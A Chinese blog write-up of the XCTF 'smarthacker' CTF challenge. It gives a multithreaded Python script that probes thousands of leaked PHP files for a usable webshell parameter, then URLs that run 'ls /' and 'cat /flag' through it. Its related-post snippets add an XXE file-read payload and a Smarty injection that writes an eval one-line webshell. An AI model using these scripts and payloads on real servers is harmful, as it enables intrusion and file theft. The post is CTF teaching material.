xctf攻防世界smarthacker wp

最新推荐文章于 2024-03-14 15:06:59 发布
最新推荐文章于 2024-03-14 15:06:59 发布
阅读量455 收藏
点赞数
分类专栏: CTF writeup 文章标签: web 安全 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46676743/article/details/113869133
版权
CTF 同时被 2 个专栏收录
14 篇文章 1 订阅
订阅专栏
writeup
12 篇文章 0 订阅
订阅专栏

xctf攻防世界smarthacker wp

在这里插入图片描述
考察知识点:源码泄露 python脚本
访问题目地址
在这里插入图片描述
下载www.tar.gz
我直呼好家伙,三千多个php文件,而且很乱,根本没法看,不过里面包含很多shell
在这里插入图片描述
在这里插入图片描述

不过很多shell都没用,猜测这几千个php文件中肯定含有可以使用的shell,只有写脚本去试了
掏出脚本:

import requests
import os
import re
import threading
import time

requests.adapters.DEFAULT_RETRIES = 8 #设置重连次数,防止线程数过高,断开连接
session = requests.Session()
session.keep_alive = False # 设置连接活跃状态为False

sem=threading.Semaphore(30) # 设置最大线程数 ,别设置太大,不然还是会崩的挺厉害的,跑到关键的爆炸,心态就爆炸了

url = "http://111.200.241.244:59960/"

#######  下载的源文件路径,根据自己的路径修改
path = r"/root/src/"


rrGET = re.compile(r"\$_GET\[\'(\w+)\'\]") #匹配get参数

rrPOST = re.compile(r"\$_POST\[\'(\w+)\'\]") #匹配post参数

fileNames = os.listdir(path) # 列出目录中的文件,以每个文件都开一个线程


local_file = open("flag.txt","w",encoding="utf-8")

def run(fileName):
    with sem:
        file = open( path + fileName, 'r',encoding='utf-8' )
        content = file.read()
        print("[+]checking:%s" % fileName )
        #测试get的参数
        for i in rrGET.findall(content):
            r = session.get( url + "%s?%s=%s" % (fileName,i,"echo ~h3zh1~;") )
            if "~h3zh1~" in r.text:
                flag = "You Find it in GET fileName = %s and param = %s \n" % ( fileName, i )
                print(flag)
                local_file.write(flag)
        #测试post的参数
        #for i in rrPOST.findall(content):
        #   r = session.post( url + fileName , data = { i : "echo ~h3zh1~;" } )
        #   if "~h3zh1~" in r.text:
        #       flag = "You Find it in POST: fileName = %s and param = %s \n" % ( fileName, i )
        #       print(flag)
        #       local_file.writelines(flag)
if __name__ == '__main__':
    start_time = time.time() # 开始时间
    print("[start]程序开始:"+str(start_time))
    thread_list = []
    for fileName in fileNames:
        t = threading.Thread( target=run , args=(fileName,) )
        thread_list.append(t)
    for t in thread_list:
        t.start()
    for t in thread_list:
        t.join()
        
    end_time = time.time()
    local_file.close()
    print("[end]程序结束:用时(秒):"+str(end_time-start_time))

跑出结果
在这里插入图片描述

http://111.200.241.244:59960/xk0SzyKwfzw.php?Efa5BVG

在这里插入图片描述
康康有没有flag

http://111.200.241.244:59960/xk0SzyKwfzw.php?Efa5BVG=ls%20/;

在这里插入图片描述
读取flag

http://111.200.241.244:59960/xk0SzyKwfzw.php?Efa5BVG=cat%20/flag;

在这里插入图片描述

http://111.200.241.244:59960/xk0SzyKwfzw.php?Efa5BVG=cat%20%20/flag;

在这里插入图片描述
这。。。
明明有flag啊
怀疑出题人没放flag就溜了[狗头]

sash1mi
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XCTF攻防世界web.doc
09-19
XCTF攻防世界Web WriteUp】 在网络安全竞赛中,CTF(Capture The Flag)是一种常见的形式,其中“XCTF攻防世界”是一个专注于Web安全的平台,旨在帮助参与者提升网络安全技能,特别是Web应用的安全防御和攻击能力...
xctf攻防世界unagi wp
sash1mi
02-19 605
xctf攻防世界unagi wp 访问题目地址 点击Upload下的here 从信息提示中可以知道要通过编写xml文件上传 即通过XXE编码转换成utf-16编码绕过 可以利用vim编辑xml文件(取名为2.xml)代码如下: <?xml version='1.0'?> <!DOCTYPE users [ <!ENTITY xxe SYSTEM "file:///flag" >]> <users> <user>
强网杯2019(高明的黑客&强网先锋上单)
kid的博客
05-30 5596
强网杯2019(高明的黑客&强网先锋上单)   前言 这里主要是对强网杯web中高明的黑客和上单两道题进行一个复现回顾 再次感谢大佬提供的场景复现:https://www.zhaoj.in/read-5873.html   高明的黑客 题目是先下载给出代码 比赛时拿到这道题一下就被打懵了 3000多个文件,打开还是奇奇怪怪得文件内容 当时是真不知道,怎么做 OK现在...
2019 第三届强网杯线上赛部分web复现
weixin_30881367的博客
05-28 653
0x00前言 周末打了强网杯,队伍只做得出来6道签到题,web有三道我仔细研究了但是没有最终做出来,赛后有在群里看到其他师傅提供了writeup和环境复现的docker环境,于是跟着学习一波并记录下来 0x01 upload 第一步扫目录发现有备份文件 下载下来后大致浏览就清楚是thinkphp5框架,并且没有远程代码执行漏洞 根据题目的数据传输情况,可以发现在登录后有个us...
CTF Docker环境题目大全
NAUYX转
03-26 786
CTF Training 经典赛题复现环境 I need your help!!! 环境说明 Explain docker-ce version 18.09+ docker-compose version 1.23+ Installation # Install pip curl -s https://bootstrap.pypa.io/get-pip.py | python3 # Install the latest version docker curl -s https://get.d
攻防世界--smarty
qq_46263951的博客
01-07 1117
根据题目和页面内容提示,可以知道这里使用的是PHP中的Smarty模板 网上看这个模板存在着模板注入,但是没有找到参数,猜测在请求头 那就有两种可能的注入点: XFF client IP 发现XFF存在注入 测试phpinfo()发现这里禁用了很多函数,并且可访目录也做了限制 使用{if}标签写入一句话木马 {if file_put_contents('/var/www/html/shell.php','<?php eval($_POST[cmd]);')}{/if} ...
XCTF mfc逆向-200
12-22
查壳 vmp。。。 看了大佬博客后得知解法 这是一个MFC程序,但我不会。。。...但是我知道mfc的程序应该都是一个个控件组成 ...发现这两个东西,第一个是窗口类名,第二个我也不晓得是啥,但是它比前面和后面的少了一个消息...
XMan-MISC-诸葛建伟XCTF-public.pdf
12-04
MISC,中文即杂项,包括隐写,数据还原,脑洞、社会工程、与信息安全相关的大数据等。 竞赛过程中解MISC时会涉及到各种脑洞,各种花式技巧,主要考察选手的快速理解、学习能力以及日常知识积累的广度、深度。...
圣徒xctf网站
02-14
圣徒xctf网站概述SaintsXCTF Web应用程序的前端。 这是SaintsXCTF Web应用程序的第二个版本。 前端使用React.js编写,并使用Sass进行样式设置。 API调用通过Nginx代理路由到 。指令在本地启动应用程序首次设置应该...
CTF题型 SSTI(3) Smart SSTI 例题和题记
最新发布
qq_39947980的博客
03-14 491
前面我们学习了Flask SSTISmart SSTI和Flask SSTI 不同Smart SSTI 是基于php的,居然可以在其中参考 Smart中文手册 https://www.smarty.net/docs/zh_CN/这里我们用 https://www.smarty.net/docs/zh_CN/language.function.eval.tpl#id456693标签{eval}执行任意php代码。
XCTF Web 记录(unagi)
ximo的博客
03-09 354
unagi 打开页面,四个跳转。 一个提示页面: 一个利用方式提示: 一个利用点: 利用方式: XXE注入。 构造XXE注入代码: <?xml version='1.0'?> <!DOCTYPE users [ <!ENTITY xxe SYSTEM "file:///flag" >]> <users> <user> <username>bob</username> <pa
攻防世界 web高级 leaking
beihai2013
01-18 687
考察:node.js逃逸 参考: https://blog.csdn.net/weixin_44037296/article/details/112387663 https://blog.csdn.net/weixin_46676743/article/details/112669105 不知道咋说,直接抄源码 # encoding=utf-8 import requests import time url = 'http://220.249.52.134:41148/?data=Buffer(500)'
攻防世界web解题[进阶](六)
weixin_46703850的博客
03-10 591
攻防世界web解题[进阶](六)
攻防世界 web高手进阶区 5分题 unagi
闵行小鱼塘
04-12 475
攻防世界web高手进阶区的5分题,本篇是unagi的writeup
BUUCTF:[CSAWQual 2019]Web_Unagi
末初的CSDN博客
04-06 1920
XXE编码转换为UTF-16绕过 2.xml <?xml version='1.0'?> <!DOCTYPE users [ <!ENTITY xxe SYSTEM "file:///flag" >]> <users> <user> <username>bob</username> ...
CSAW2017_CTF_Web_Writeup
dengzhasong7076的博客
09-18 273
前言 还比较忙,还有题目得明天跟一下。 orange 系列 v1 http://web.chal.csaw.io:7311/?path=orange.txt v3 http://web.chal.csaw.io:7312/?path=orange.txt 说实话是比较迷的,因为有意外解,导致他开始是400分,后面变成100分,最后出v3版本才是300分。 不过考点是nodejs常用的一个...
XCTF-WEB
qq_43661408的博客
06-22 497
post和get 题目链接:http://111.198.29.45:34348/ 解题思路 首先使用 get方式提交变量a等于1 即 http://111.198.29.45:34348/?a=1 得到 第二条信息 需要使用post提交一个变量b值为2 因此使用火狐自带的插件hackbar,但是现在火狐更新后不能使用了,替代hackbar的插件有了 Max hackbar 和 hackbar q...
【CTF】二次注入原理及实战
hhhhhhhhh85的博客
11-15 9663
二次注入 文章目录二次注入1、概述2、原理3、注入方法4、CTF实战 1、概述 二次注入是指已存储(数据库、文件)的用户输入被读取后再次进入到 SQL 查询语句中导致的注入。 二次注入是sql注入的一种,但是比普通sql注入利用更加困难,利用门槛更高。普通注入数据直接进入到 SQL 查询中,而二次注入则是输入数据经处理后存储,取出后,再次进入到 SQL 查询。 2、原理 二次注入的原理,在第一次进行数据库插入数据的时候,使用了 addslashes 、get_magic_quotes_gpc、mysql_e
攻防世界writeup——Web(持续更新)
Lethe's Blog
08-12 8180
lottery(XCTF 4th-QCTF-2018) 打开题目先注册,然后发现flag可以购买。但得先去买彩票赢得足够的钱,七位数字的彩票,猜中的位数越多,赢得的钱越多,因此应该在买彩票这里出了一些漏洞。 1、首先访问目录robots.txt,存在.git泄露。 2、利用工具GitHack,得到网站源码: 3、进行代码审计,问题出现在api.php里的buy函数,这个函数就是用来判断是否猜...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值